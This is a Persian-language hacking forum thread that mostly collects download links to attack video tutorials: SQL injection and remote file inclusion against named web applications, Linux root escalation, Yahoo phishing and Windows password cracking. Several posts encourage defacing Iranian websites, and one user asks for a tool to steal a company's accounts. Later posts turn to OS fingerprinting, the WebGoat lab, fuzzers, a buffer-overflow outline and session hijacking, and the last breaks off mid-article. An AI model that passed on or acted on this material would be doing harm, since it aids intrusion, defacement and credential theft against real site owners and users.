http://www.nader1781.persiangig.com/video/dotWidget.rar

Exploit:
http://www.milw0rm.com/exploits/1879



بافر اورفلو
DOwnLoad (http://erkan.fastsponsors.de/videods/Buffer_Overflows.rar)
pass=htool01


گرفتن اکسس روت بعد از گرفتن شل بر سايت اي با نمونه اي از باگ هایRFI
البته توضيحات در فيلم به زبان روسی هست که مهم نيست خود فيلم رو ببينيد همه چی رو متوجه ميشيد



http://rapidshare.de/files/20011472/mysqlroot.rar.html





Get Linux Local Root Access


Download Clip (http://mormoroth.by.ru/LocalRoot.rar)








How To Make ***** Server


شل که ميگيرين ميتونی يه حالی به رفيقات بدی :
3 تا فيلم SWF هست


ِDownload 1 (http://aria-security.net/Forums/uploaded/182_1151017753.rar)
Download 2 (http://aria-security.net/Forums/uploaded/182_1151018356.rar)
Download 3 (http://aria-security.net/Forums/uploaded/182_1151019076.rar)



فيلمی در موردفيشينگ يا هک هويت در ياهو
DownLoad (http://h4ckingworld.netsons.org/H4ckingworld_VideoTutorial/PishingYahoo.rar)


دوستان این فیلم ها خیلی جدید نیستند ولی با دیدن این فیلم ها یاد گرفتن روش های دیگه خیلی آسون تره ، در ضمن شاید شما بعضی از این ها رو اصلا ندیده باشید ، به هر حال دیدن هر فیلمی ضرر نداره !!

ابن فیلم درباره نحوه نصب لینوکس ( Knoppix ) بر روی ویندوز با استفاده از WMware هست ...
http://www.irongeek.com/videos/vmwareplayerlivecd.swf

این فیلم نحوه کرک کردن یوزر و پسورد ادمین ویندوز XP رو نشون میده
http://www.hemenpaylas.com/download/...edit_.rar.html (http://www.hemenpaylas.com/download/433662/admin_pass_edit_.rar.html)

d2kBlog 1.0.3 (memName) Remote SQL Injection
http://rapidshare.de/files/19757276/tr.rar.html

آموزش هک کردن گالری 4Image که توی ایران هم خیلی استفاده میشه و اکسپلویتش هم توی milw0rm هست ....
http://www.hemenpaylas.com/download/...aDaYi.rar.html (http://www.hemenpaylas.com/download/819163/4Images_1.7.1_KaBaDaYi.rar.html)

آموزش هک کردن OsCommerce 2.2
http://www.hemenpaylas.com/download/...aDaYi.rar.html (http://www.hemenpaylas.com/download/818602/Oscommerce_KaBaDaYi.rar.html)

آموزش هک کردن VB توسط متد SQL Injection ( یکم قدیمی هست ولی برای مبتدی ها خوبه ! )
لینک دریافت = http://www.hemenpaylas.com/download/...vbSql.rar.html (http://www.hemenpaylas.com/download/886805/vbSql.rar.html)

آموزش هک کردن IPB توسط متد SQL Injection ( اینم بد نیست ! )
لینک دریافت = http://rapidshare.de/files/16532170/...board.rar.html (http://rapidshare.de/files/16532170/i.powerboard.rar.html)

آموزش نحوه سرچ کردن در گوگل برای پیدا کردن سایت های آسیب پذیر ( خیلی ضرور برای دوستان تازه کار ! )
لینک دریافت = http://rapidshare.de/files/19728461/dorking.rar.html

آموزش هک کردن CMS dotWidget که همین 2-3 روزه باگش کشف و اکسپلویتش نوشته شد ! ( اینم برا خوره Deface ها بد نیست ! )
لینک دریافت = http://www.nader1781.persiangig.com/video/dotWidget.rar

آموزش هک کردن برنامه های PHPFanBase, FA-PHPHosting ,PHPClique, PHPCalendar, PHPCurrently , ... ( حجم 5 MB هست ولی می ارزه !! )
لینک دریافت = http://x-lab.minipars.com/learn.zip

آموزش هک کردن ashnews که همین 2-3 روز پیش از تنور در اومده که از متد Remote File Inclusion استفاده میکنه !
لینک دریافت = http://www.pldsoft.de/HackDemos/ashnews/ashnews.html

آموزش هک کردن UBBThreads که زیاد جدید نیست ولی بازم خوبه !
لینک دریافت = http://www.pldsoft.de/HackDemos/UBBT...BBThreads.html (http://www.pldsoft.de/HackDemos/UBBThreads/UBBThreads.html)

آموزش هک کردن PHP-Nuke برای همه ورژن ها ( اگه عشق Deface کردن سایت ایرانی داری حتما ببین !! )
لینک دریافت = http://rapidshare.de/files/21884544/nuke.rar.html

آموزش هک Wordpress که توی ایران تقریبا طرفدارهای زیادی داره !! ( البته این برای ورژن 1.X هست ! )
لینک دریافت = http://www.pldsoft.de/HackDemos/word...wordpress.html (http://www.pldsoft.de/HackDemos/wordpress/wordpress.html)

آموزش هک Xoops که یه سیستم مدیریت محتوا تقریبا قوی هست !! ( اینم برای ورژن قبلی این برنامه جواب می داد ! )
لینک دریافت = http://www.pldsoft.de/HackDemos/xoops/xoops.html

آموزش هک برنامه EXuserManager که از متد RFI برای نفوذ استفاده می کنه !
لینک دریافت = http://www.megaupload.com/?d=CNDA1I3T

آموزش هک phpbb 2.0.17 که خیلی از سایت های ایرانی ازش استفاده میکنن ( من حتی توی ایران دیدم از 1.0 هم استفاده میکنن !! )
لینک دریافت = http://www.sendspace.com/file/u1v0dv

آموزش هک phpNuke ورژن 7.5 - 7.8 که خوراک سایت های ایرانی هست ( با این قالب مزخرف مشهد تیم !! )
لینک دریافت = http://rapidshare.de/files/17377410/...ploit.rar.html (http://rapidshare.de/files/17377410/phpbuke-exploit.rar.html)

آموزش هک TR Newsportal که یه مقدار قدیمی شده ولی دیدنش ضرر نداره !
لینک دریافت = http://rapidshare.de/files/20555994/...ortal.rar.html (http://rapidshare.de/files/20555994/TR_Newsportal.rar.html)

آموزش هک Dokeos LMS که اینم بدک نیست !
لینک دریافت = http://rapidshare.de/files/19909800/Dokeos.rar.html

آموزش هک PlanetGalery که خیلی از سایت های خارجی باهاش کار میکنن !
لینک دریافت = http://www.hemenpaylas.com/download/...aleri.rar.html (http://www.hemenpaylas.com/download/637910/galeri.rar.html)

آموزش هک DMCounter که اینم یه مقدار قدیمی هست ولی دیدنش ضرر نداره !
لینک دریافت = http://www.paylas.com/download/274809002/dmc.rar.html

آموزش هک openphpnuke که اینم سایتهای ایرانی زیاد استفاده میکنن و هنوز هم خیلی قدیمی نشده !
لینک دریافت = http://www.hemenpaylas.com/download/...pnuke.rar.html (http://www.hemenpaylas.com/download/615240/openphpnuke.rar.html)

آموزش هک Aardvark که از مشتقات BB هست !
لینک دریافت = http://www.hemenpaylas.com/download/...k_RFI.rar.html (http://www.hemenpaylas.com/download/612747/aardvak_RFI.rar.html)

آموزش هک indexu که از متد RFI استفاده میکنه و هنوز هم خیلی جاها پچ نشده !
لینک دریافت = http://www.hemenpaylas.com/download/...ndexu.rar.html (http://www.hemenpaylas.com/download/454765/indexu.rar.html)

آموزش هک Advanced GuestBook که اینم یکی دیگه از مشتقات BB هست !
لینک دریافت = http://rapidshare.de/files/19166756/...phpBB.rar.html (http://rapidshare.de/files/19166756/Advanced_GuestBook_for_phpBB.rar.html)

install VNc in shel
http://www.mormoroth.persiangig.com/video/vnc.rar
passw0rd : hexhackers



یک سری فیلم آموزشی در مورد secure کردن سرور های لینوکس ( به درخواست hoormazd ) گذاشتم امید وارم نهایت استفاده رو برده باشید

http://news.ah4.org/ftp/20040516/01/
Parent Directory -
Linux Security-01.mpg 19-Jun-2004 23:48 150M
Linux Security-02.mpg 19-Jun-2004 23:43 150M
Linux Security-03.mpg 19-Jun-2004 23:39 150M
Linux Security-04.mpg 19-Jun-2004 23:39 173M
Linux Security-05.mpg 19-Jun-2004 23:30 28M


گرقتن اکسس روت در لینوکس
Here (http://rapidshare.de/files/18195248/Root_on_Linux.rar.html)
you need tscc to view this clip
get it
tscc (http://rapidshare.de/files/18746012/tscc.zip.html)




هک SaphpLesson2.0

http://www.lamoo.persiangig.com/vide...pLesson2.0.zip

ahwaz20
25-10-2006, 16:49
با سلام من یه برنامه میخام که بشه باش اکنت دزید من از یه شرکت خیلی بدم میاد و تمام یوزراش دسه منه کمکمکمکمکمک

pastoo
25-10-2006, 20:20
دوستان تایپیک رو به دلایل شخصی میبندم

موفق باشید

mahdioja
26-10-2006, 12:47
با سلام حضور اسا تید
می خوام از شما خواهش کنم که در مورد به دست آوردن رمز سوپر وایزر ناول کمکم کنید
در ضمن اگر از دوستان کسی در مورد روترهای سیسکو سوالی داشته باشه در حد توان در خدمتیم
با تشکر
mehdi
mahdioja59@yahoo.com

sweet Noise
26-10-2006, 13:15
با سلام من یه برنامه میخام که بشه باش اکنت دزید من از یه شرکت خیلی بدم میاد و تمام یوزراش دسه منه کمکمکمکمکمک


دوست عزيز:
قرار دادن و در خواست هرگونه مطالب و نر افزاهراي هك و جاسوسي در شبكه ، اينترنت و .... خلاف قوانين سايت ميباشد...
مخصوصاٌ براي بدست آوردن نام كاربري و رمز عبور..!!!!!


pastoo: دوستان تایپیک رو به دلایل شخصی میبندم

به گفته شخص باز كننده تاپيك و قرار بر ادامه ندادن مطالب در آن و خواست خود ايشان تاپيك مربوطه بسته شد.


موفق باشيد...

pastoo
16-01-2007, 10:47
با تشکر از زحمات محسن عزیز در بخش کامپیوتر این تایپیک هم به اینجا انتقال داده شد و باز شد
دوستان میتوانند آموزش های تخصصی امنیت را از اینجا مشاهده کنند

موفق باشید

اميرعلي
16-01-2007, 11:58
مطالب خيلي مفيد هستند لطف مي كنيد فقط من يك مشكلي دارم
رپيدشير تو آي اس پي من فيلتر شده يا يك فيلتر شكن براي رد شدن از رپيدشير معرفي كنتيد
يا يك راه حل براي اين موضوع يا اگر زحمتي نيست(كه فكر مي كنم هست ) فايلها رو تو يك سايت ديگر آپلود فرمائيد .

pastoo
16-01-2007, 16:33
دوست من سلام

1 کی از مهمترین قوانین این سایت این است که اجازه معرفی هر گونه p ro x y و هر برنامه فیلتر شکن خودداری و جلو گیری کنیم .
راجع به درخواست شما چشم از این به بعد آموزش های جدید در سایت قرار خواهد گرفت
موفق باشید

pastoo
17-01-2007, 20:35
روش شناسایی TTL:

این روش رو همتون میشناسید بله استفاده از فرمان PING است خوب وقتی شما یه SERVER رو pING میکنید

یک سری بسته هایی به SERVER از سیستم شما فرستاده میشود که ما در جواب این بسته ها یه سری اطلاعات میگیریم

فرمان PING را من روی یه سیستم شخصی امتحان کردم به این شکل میدهد:

فرمول pING: PING +IP

C:\WINDOWS> PING 203.168.117.8

REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128

REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128

REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128

خوب ما با بقییه جملات کاری نداریم فقط فهمیدیم که مقداره TTL=128 هستش یعنی سیستم عامل ویندوز هست

من TTL های سیتم های عامل رو براتون گذاشتم نگاه کنید(VERSIAN OF TTL)

WINDOWS 9X/NT INTEL =32

WINDOWS 2000 INTEL =128

DIGITALUNIX 4.0 ALPA =60

UNISYS XMAINFRAME =64

LINUX 2.2X INTEL =64

FTX (UNIX) 3.3STRTUS =64

SCO COMPAQ =64

NETWARE 4.11 INTEL =128

AIX 4.3X IBM/R6000 =60

AIX 4.2 IBM/R6000 =60

CISCO 11.2 =7507 60

CISCO 12.02 =514255

IRIX 6.0 SGI =60

نکته: مقداره TTL در هر ROUTER به یک میزان کم میشود ما برای اینکه تعداد ROUTER

ها رو با استفاده از فرمان TRACE در DOS به فهمیم این دستور این است

C:/WINDOS> TRACERT IP

نقاط ضعف این روش: 1)یه سرور میتونه TTL جعلی بسازه 2)TTL هافقط نوع سیتم عامل را میدهند

و VERSION سیتم عامل را به ما نمی دهد مثلا LINUX RED-HAT 6.1,LINUX RED HAT 72

3) سیتم هایی که فایر وال دارند قابل PING شدن نیستند

روش BANNER GRABBING :

هر WEB SEVERیا FTP SERVER به طور پیش فرض یه سرتیتر به نام BANNER داردکه

ما با گرفتن BANNER یک SERVER میتونیم به نسخه عامل ان پی ببریم مثلا اگه ما SEVER

TELNET کنیم میدهد

خوب من الان میخام به SERVER سایت INSECURD.ORG

TELNET> TELNET INSECRUD.ORG.80

connect to insecurd.org......

get index.html(or anything) http/1.1

host:server (or anything)

content-lenght: 10(or anything

hhtp/1.1 400 bad reqoust

date:tue,16 november 2002 11.30.00 gmt

server:apache/2.00.39(unix) mod-perl/1.99-04-devperl/v 5.6.1

content-lenght:386

connection:close

نقاط ضعف روش baner grabbing:la; مشکل این رئش این است که یک مدیر سایت میتواند تمام BANNER ها رو

حذف کند من البته از این روش زیاد استفاده کردم خوب جواب میده

روش انگشت نگاری (FINGERPRINTING METHOD)"

بهترین روش شناساییست که با استفاده از ظبط بسته های ارسالی از کامیوتر مقصدوثبت فاصله زمانی و دریافت پیام

خطا و..... شناسایی کنیم و 4 روش دارد 1)FEATURES OF TCP IMPLEMENTATION

2)ICMP ERROR MESSAGE QUENCHING

3)SNIFING DATA PACKETS

4) INITIAL SEQUNCE NUMBER SAMPELING

راستی بروبچ من روش SNIFING رو توصیه میکنم براتو اگه شد یه SNIFER توپ میذارم

pastoo
17-01-2007, 20:48
محيط آزمايشگاهي ...
به نقل از شبگرد :
برنامه ای که میتونین توی محیط insecure web application که بوجود میاره مهارت های خودتون از اینجکتشنا گرفته تا شل گرفتن رو روش بررسی کنید یک نوع شبیه سازی سرور نا امن هست!

اگه تست كرديد و مشكلي بود اينجا عنوان شه ..




به قول websecurity :

همه کسانی که در دنیای امنیت و هکینگ کار کرده و می کنن یقینا با مباحث وب هکینگ و موضوعات جانبی اون آشنایی دارند و یا حداقل در مورد اون چیزهایی شنیده و یا خوندند و کسانی که بیشتر در این زمینه تخصصی کار کردن به بهرانی بودن این موضوع واقف هستند !! پس واقعا هر شخصی که قصد کار کردن در این زمینه رو داشته باشد باید با مثالهای عملی و واقعی و در انواع مختلف این موضوع را زیره زره بین کنکاش قرار دهد.

:WebGoat یک فریم ورک عالی با قابلیت انعطاف و امکانات می باشد که شما می توانید انواع حملات به برنامه های کاربردی را بر روی آن تست کنید .

موارد کاربرد :

* Cross Site Scripting
* SQL Injection
* Thread Safety
* Hidden Form Field Manipulation
* Parameter Manipulation
* Weak Session Cookies
* Fail Open Authentication
* Dangers of HTML Comments
* and many more...



محل دريافت :

http://m1.2mdn.net/1251053/pb_sfee.gif
http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61824 (http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61824)</SPAN>


مراحل راه اندازی اولیه :
1- ابتدا packege را از حالت فشرده خارج کرده .
2- بر روی فایل : webgoat.bat کلیک مینمایید .
3- سپس با توجه به تغییراتی که در سیستم شما وجود داشته ، بر روی یکی از دو آدرس زیر میتوانید خالت GUI را مشاهده کنید :

http://localhost/WebGoat/attack (http://localhost/WebGoat/attack)
با
http://localhost:8080/WebGoat/attack (http://localhost:8080/WebGoat/attack)

4- اگه همه چیز موفقیت آمیز بوده باشد ، پنجره ای باز شده و از شما user&pass میخواهد که میتوانید مقدار :

user:guest
pass:guest
را وارد کنید .

5- گزینه start را مشاهده میکنید
6-نام خود را وارد کنید و شروع به تست حملات کنید

pastoo
26-01-2007, 00:10
فازرها برنامه هایی برای کشف ایرادات امنیتی برنامه ها بوسیله فرستادن اطلاعات تصادفی به
برنامه ها هستند.اگر برنامه ها دارای حفره ها و ایرادات امنیتی باشد می تواند آن را به ما نشان دهد و ما را در راه رسیدن به حفره یاری کند.

از كار افتادن برنامه و یا اشتباهات برگشتی از سرورها (در این حالت برنامه های کاربردی) نشان دهنده ی کشف یک ایراد توسط این برنامه ها هستند.

فازرها Fault Injectors هم نام گرفته اند چون اساس کار آنها با فرستادن یک اشتباه و ایراد به برنامه ی کاربردی و نشان دادن عکس العمل آن است. این برنامه ها برای پیدا کردن ایرادات مربوط به

BufferOverflow.1

DoS.2

SQL Injection.3

Xss.4

Format String Bugs.5

بسیار خوب و کاربردی هستند و برای یافتن ایرادت مربوط به نشت اطلاعات و ایرادات مربوط به رمز گذاری ضعیف عمل می کنند.

برنامه های زیر از معروفترین برنامه ها برای اینکار هستند.

1.مجموعه ای از اسکریپت ها پایتون برای fuzzing:

http://lxapi.sourceforge.net/ (http://lxapi.sourceforge.net/)



2.برنامه ی Mangle از این برنامه برای پیدا کردن باگ های نه چندان مشهور IFRAME اینترنت اکسپلورر استفاده شده است

http://lcamtuf.coredump.cx/soft/mangleme.tgz (http://lcamtuf.coredump.cx/soft/mangleme.tgz)



3. برنامه ی SPIKE :مجموعه ی چندین فازر شرکت Immunity و استفاده شده برای پیدا کردن حمله DoS در سرویس RDP Kernel موجود در ویندوز اکس پی سرویس پک 2 شرکت مایکروسافت.

http://www.immunitysec.com/downloads/SPIKE2.9.tgz (http://www.immunitysec.com/downloads/SPIKE2.9.tgz)



4.برنامه ی PROTOS WAP: این برنامه جزو مجموعه فازرهای پروژه PROTOS است برایfuzzingدر WAP بکار می رود.

http://www.ee.oulu.fi/research/ousp.../c04-wap-r1.jar (http://www.ee.oulu.fi/research/ousp.../c04-wap-r1.jar)



5.برنامه ی PROTOS HTTP-reply : این برنامه یکی دیگر از فازرهای پروژه ی PROTOS است که برای حمله به پاسخگویی پروتکل HTTP طراحی شده است. از این ابزار بیشتر برای پیدا کردن ایرادات مربوط به مرورگرها بکار می رود.

http://www.ee.oulu.fi/research/ousp...tp-reply-r1.jar (http://www.ee.oulu.fi/research/ousp...tp-reply-r1.jar)



6.PROTOS LDAP:فازری برای LDAP ولی نسبت به بقیه فازر های این شرکت موفقیت چندانی کسب نکرده و از همه گمنام تر است.

http://www.ee.oulu.fi/research/ousp...apv3-enc-r1.jar (http://www.ee.oulu.fi/research/ousp...apv3-enc-r1.jar)



7.برنامه ی PROTOS SNMP:یک SNMP فازر قدیمی است که از سال 2002 بوجود آمده و ایرادات مختلفی را بر روی لوازم و تجهیزات مربوط به شبکه کشف کرده است.

http://www.ee.oulu.fi/research/ousp...-req-app-r1.jar (http://www.ee.oulu.fi/research/ousp...-req-app-r1.jar)



8.برنامه یPROTOS SIP: از این برنامه برای فازینگ بر روی تمامی تجهیزات VOIP SIP که در همه جا دیده می شود استفاده می شود.

http://www.ee.oulu.fi/research/ousp...-req-app-r1.jar (http://www.ee.oulu.fi/research/ousp...-req-app-r1.jar)



9.برنامه ی PROTOS ISAKMP: فازری که برای حمله به IPSec در حال اجرا طراحی شده است.

http://www.ee.oulu.fi/research/ousp...9-isakmp-r1.jar (http://www.ee.oulu.fi/research/ousp...9-isakmp-r1.jar)



10.برنامه های RIOT&faultmon:برای حمله به پروتکل های Telnet, HTTP, SMTP بکار می رود. در ضمن این ابزار توسط اقای Riley Hassell هنگامی که درشرکت امنیتی معروف eeye کار می کرد برای پیدا کردن باگ IIS .Printer overflow بکار گرفته شده است و در ضمن همین برنامه هم در کتابshellcoders handbook پوشش داده شده است.

http://media.wiley.com/product_anci...ource_Files.zip (http://media.wiley.com/product_anci...ource_Files.zip)



11.برنامه یSPIKE *****:این فازر همانند SPIKE است و عملی مشابهه آن را انجام می دهد.

http://www.immunitysec.com/downloads/SP148.zip (http://www.immunitysec.com/downloads/SP148.zip)





12.برنامه یTag Brute Forcer:

یک فازر ترس آور ساخته ی Drew Copley از شرکت امنیتی eeyeکه برای حمله به ActiveX applications سفارشی شده است.

از این ابزار برای دسته ای از باگ های زشت وزننده ی مرورگر مایکروسافتی استفاده شده است. این مرورگر همچنین دارای توانایی ویژه ای برای کشف باگ های مربوط بهheap overflows است.

http://www.eeye.com/html/resources/...BruteForcer.zip (http://www.eeye.com/html/resources/...BruteForcer.zip)



13.برنامه یFileFuzz: یک نوع فازر برای فایل های بایناری ویندوزی متعلق به شرکت iDefense که دارای اینترفیس گرافیکی بسیار جالبی و قشنگی است. که بتازگی اقای Jack Koziol از آن برای پیدا کردن چند باگ در برنامه ی word استفاده کرده است.

http://www.idefense.com/iia/doDownload.php?downloadID=3 (http://www.idefense.com/iia/doDownload.php?downloadID=3)



14.برنامه یSPIKEFile: فازری مختص به فایل های بایناری لینوکس و حمله به آنها در ضمن محصول شرکت iDefense است.file format fuzzer for attacking ELF (Linux) binaries

http://www.idefense.com/iia/doDownl...p?downloadID=14 (http://www.idefense.com/iia/doDownl...p?downloadID=14)



15.برنامه ی NotSPIKEFile: برای شروع بجای استفاده از SPIKE می توان از این نرم افزار استفاده کرد.

http://www.idefense.com/iia/doDownl...p?downloadID=10 (http://www.idefense.com/iia/doDownl...p?downloadID=10)



16.برنامه ی Screaming Cobra: استفاده ی بیشتر از این برنامه در زمینه پیدا کردن باگ های Cgi است.این برنامه اسکریپت کوچکی است که به آسانی تغییرپذیر و قابل توسعه است.

http://www.dachb0den.com/projects/s...bra-1.00.tar.gz (http://www.dachb0den.com/projects/s...bra-1.00.tar.gz)



17.برنامه ی WebFuzzer:

یک فازر برای پیدا کردن حفره ها موجود در برنامه هاي كاربردي وب است که بسیار بهتر از فازهای ارزان قیمت تجاری است.

http://gunzip.altervista.org/webfuz...r-latest.tar.gz (http://gunzip.altervista.org/webfuz...r-latest.tar.gz)



18.eFuzz:یک فازر هوشمند برای پروتکل Tcp/ip که برای استفاده بسیار راحت است.

http://gunzip.altervista.org/webfuz...r-latest.tar.gz (http://gunzip.altervista.org/webfuz...r-latest.tar.gz)



19.برنامه ی Peach Fuzzer :

بزرگ ترین فازری که تا بحال نوشته شده و توسط اقای Michael Eddington نوشته شده که در ادرس زیر می توانید ان را بیابید:

http://peachfuzz.sourceforge.net/ (http://peachfuzz.sourceforge.net/)



20.و اخرین مورد برنامه Fuzz است که توسط دکتر بارتون میلر در 1990 نوشته شده است و از ادرس زیر قابل دریافت است.

http://www.cs.wisc.edu/~bart/fuzz/fuzz.html (http://www.cs.wisc.edu/~bart/fuzz/fuzz.html)

pastoo
26-01-2007, 00:22
مهم پیدا کردم قسمت آسیپ پذیر در نرم افزارها هست .....

پس به ترتیب سوالاتت را بپرس ( شاید دوستانی که ازشون سوال پرسیدی جواب دادن )

1- چطور محل آسیب پذیر را پیدا کنیم ( خودش چندتا زیر مرحله داره )
2 - چطور برنامه بنویسیم که به اون محل دسترسی پیدا کنه به اصطلاح BOF کنه.
3- چطوری شل کد بنویسیم که بتونیم نهایت سوء استفاده را ببریم ( این قسمت را خوب بلد نباشی نهایتا میتونی یه برنامه DOS بنویسی )
4...........
5..........
6............

برای کتاب سی به زبون فارسی هم هیچی بهتر از کتابهای آموزش سی نوشته استاد جعفرنژاد قمی نمیتونین پیدا کنی .


قبل از نوشتن شل کد باید اسکپلویت را بنویسید
برای پیدا کردن نوع اکسپلویت هم باید محل آسیب پذیر در نرم افزار هدف را بلد باشین ..
یکی از راههایی که برای پیدا کردن باگ هست را وگوئم :



یه برنامه خودتون بنویسید ( البته فکر کنم بگردین برنامه آماده هم برای این کاری که میگم باشه )

این برنامه به یه پورت وصل بشه مثلا فرض میگیرم پورت 110 که pop3 هست
خب به عنوان مثال برای لوگین شدن به یک سرویس پاپ3 نیاز هست که دستورات اولیه که شامل تعریف یوزر و پسورد هست را بدونیم ( مراجعه به RFC های هر پروتکل )
مثلا اینطوری لوگین میکنن ( توی تلنت میتونید به یک سرویس پاپ3 وصل بشین و خودتون ببنید)

كد:
+OK Hello there.
login = joker
-ERR Invalid command.
user joker
+OK Password required.
pass mypassword
-ERR Invalid command.

خب اگه برنامه نویسهای اون سرویس آدمهای احمقی باشن ( مثلا این میکروسافتیا ) یا عاقل باشن ولی شیطون گولشون زده باشه چه اتقافی میفته ؟؟؟
سرریز بافر ...
و .....

حالا سر ریز بافر را بیا و توضیییح بده http://www.simorgh-ev.com/old/forums84/images/smiles/icon_cry.gif
سرریز بافر خودش یه سری توضیحات داره که البته مسئله ساده ای هست

1 برنامه هم اینجا براتون میزارم که محمد عزیز یا jocker خودمون نوشته و در اصل کار پیدا کردن exploit رو انجام میده




خب شما حالا مثلا یه برنامه سوکت پروگرام مینویسید که یک رشته را آماده میکند به شکل

user jokerAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA~AAAA

اون علامت مد که زدم یعنی یه عالمه A http://www.simorgh-ev.com/old/forums84/images/smiles/icon_smile.gif ( میتونید با نوشتن یک حلقه for زحمت خودتون را هم کم کنید )


برای حال دادن بیشتر به تمام شما عزیزان 1 exploit finder هم که توسط محمد عزیز یا همون joker خودمون نوشته شده اینجا براتون می زارم


موفق باشید

pastoo
29-01-2007, 01:29
در زمانهاي گذشته سرقتهاي بانكي توسط دزدان حرفه اي و با تجربه اي انجام مي شد كه سالهاي عمر خود را در اين راه گذرانده اند و به قول معروف پير اين راه شده اند ولي امروزه دزدي از بانكها توسط افراد زير 18 سالي انجام مي شود كه فقط يك ارتباط تلفني با اينترنت دارند.

براي فهميدن اين خطر سناريو هاي زير را بخوانيد :
سناريو اول :
مايكل كه يك كارمند ساده مي باشد ( كاربر مشروع) براي بررسي حساب بانكي خود(پايگاه داده ) به بانك محلي خود(سرور وب بانك ) مي رود و توسط تحويلدار آن (برنامه كاربردي وب ) كارش را انجام داده و بر مي گردد.

سناريو دوم:
ادوارد (كاربر نامشروع) به همان بانك محلي رفته و از در جلو وارد مي شود(پورت 80 ) و خودش را شبيه هر مشتري كه مي خواهد مي كند !
او حتي به اين فكر مي كند كه براي سرقت بانك لازم نيست كه از درهاي ديگر وارد شود (پورتهاي ديگر ) بنابراين از نظر نگهبان جلو در (ديواره آتش) او فرد بي خطري مي باشد. او توسط تحويل دار ديگري (برنامه كاربردي وب) سرويس دهي مي شود در حاليكه او به دروغ خود را مايكل معرفي كرده است و تحويل دار نيز اين را باور كرده است(مديريت نشست ها (Session Management )) كه او ادوارد نيست و مايكل مي باشد. بنابراين به او اجازه مي دهد كه به حساب بانكي مايكل دسترسي داشته باشد.

سناريو دوم يك حمله واقعي جعل هويت را شرح مي دهد كه توسط نگهبان امنيتي (ديواره آتش) نيز قابل شناسايي نمي باشد.
ازدياد تجارتخانه هاي الكترونيكي و يا هر چيز ديگري كه توسط اينترنت انجام مي شود باعث شده است حملات به آنها از دنياي واقعي به دنياي مجازي نفوذگران تغيير مكان دهد.
نتيجه چنين حملات جعل هويتي در برنامه هاي كاربردي وب ( كه در دنياي نفوذگران به حملات جعل هويت[2] (http://www.websecuritymgz.com/n1/newsaddhtml.asp#_ftn2) معروف است ) باعث آشكار شدن اطلاعات و هويت افراد و پس از آن دستبرد و دزدي سرمايه هاي آنها در وب مي باشد.
به علت ضعف ديواره هاي آتش در تشخيص چنين حملاتي باعث شده است كه اينگونه حملات مورد توجه بسياري از نفوذگران كلاه سياه قرار گيرد و باعث دغدغه خاطر و نگراني بسياري از مديران سايت ها و برنامه نويسان تحت وب قرار گرفته است.
در اين مقاله قصد بر آن است كه توضيح بسيار مختصري درباره اين نوع حمله داده شود و توسط مثالهايي كه زده مي شود فهم اين مطلب را براي بسياري از دوستان راحت كنيم. هر چند براي فهم بهتر اين مطلب بايد آشنايي تقريبي با تكنيكها مديريت نشست ها داشته باشيد. در پايان نيز راههاي مقابله با اين گونه حملات بيان شده است كه اميد است مورد توجه مديران و برنامه نويسان سايتها قرار گيرد.

مديريت نشستها
مديرست نشستها شامل تكنيكهايي مي باشد كه به وسيله برنامه هاي كاربردي وب به كار مي رود تا براي هر درخواست Http اي كه كاربران مي فرستند هر باره LOGIN نكنند و كسب مجوز لازم براي حق دسترسي به آن درخواست داده شود. مسووليت مديريت اين كار توسط خود برنامه كاربردي وب مي باشد. به همين وسيله مي باشد كه پروتكل Http از حالت Stateless به حالت Statefull درآيد.مديريت نشست ها به اين صورت مي باشد كه برنامه كاربردي وب پس از دادن كسب مجوز لازم براي كاربر يك نشانه نشست براي او ارسال مي كند. در بيشتر مواقع اين نشانه توسط مجموعه كوكيها تنظيم مي گردد كه در سيستم مشتري ذخيره مي شود. اين نشانه هاي نشست با هر درخواستي كه كاربر دارد ارسال مي گردد تا برنامه كاربردي وب بر طبق آن هويت شما را تشخيص دهد.

مثال ساده :
وقتي در سايت www.iranianchat.com (http://www.iranianchat.com/) وارد مي شويد و مي خواهيد وارد اتاق گفتگو شويد هنگامي كه يك اسم را انتخاب مي كنيد و وارد اتاق مي شويد برنامه كاربردي يك نشانه نشست(chatID ) به شما مي دهد كه در متن صفحه اتاق گفتگو نهفته است و وقتي كه شما پيغامي را براي دوستتان مي فرستيد پيغام شما به همراه اين نشانه براي برنامه كاربردي ارسال شده و متن فرستاده شده از طرف شما روي صفحه ظاهر مي گردد.يعني به صورت زير:


http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3087.2&PostMsg=Hello (http://www.englishpersian.com/Chat1/Chat.asp?ChatID=3087.2&PostMsg=Hello)

و از همين طريق مي باشد كه برنامه كاربردي تشخيص مي دهد كه كدام كاربر كسب مجوز دارد و كدام ندارد در مثال بالا يعني كاربري كه پيام خود را ارسال مي كند آيا قبلا اسمي براي خود انتخاب كرده است يا خير !
مكانيسمهاي مديريت نشستها را در دو دسته مي توان گنجاند : مكانيسمهاي سمت مشتري و مكانيسمهاي سمت سرور . اين دسته بندي بر اساس محتواي نشانه هاي نشست هايي است كه بين مشتري و برنامه هاي كاربردي رد و بدل مي شود.

مديريت نشستهاي سمت كاربر
در اين نوع از مديريت نشستها ، نشانه توكن شامل ضروري ترين بخش براي دادن كسب مجوز به كاربران مي باشد.بنابراين اين بخش از اطلاعات كسب مجوز در سمت مشتري خيره مي شود كه اغلب اين كار توسط كوكيها در سمت مشتري انجام مي گردد. حال اگر كسي اين نشانه را طوري ماهرانه تغيير دهد تا شبيه نشانه فرد ديگري شود آنگاه برنامه كاربردي اينگونه فكر مي كند كه اين شخص همان شخص است.

مديريت نشستهاي سمت سرور
يك اختلاف اساسي بين اين نوع از مديريت با نوع قبلي وجود دارد و آن اين است كه در اين نوع مديريت اطلاعات كاربران در بانك اطلاعاتي سرور ذخيره مي شود و در كوكيها هيچ اطلاعاتي ذخيره نمي گردد. ولي در اينجا نيز نشانه نشست (Token Session ) بين سرور و كاربر رد و بدل مي شود. به عنوان مثال وقتي وارد سايت xyzbank.com مي شويد و پس از اينكه كسب مجوز لازم براي ورود به سايت را دريافت كرديد يك sessioniID به شما تعلق مي گيرد كه اين نشانه شما مي باشد.


Amiri :
http://www.xyzbank.com/showbil.asp?sessionID=1027 (http://www.xyzbank.com/showbil.asp?sessionID=1027)
Alizade:
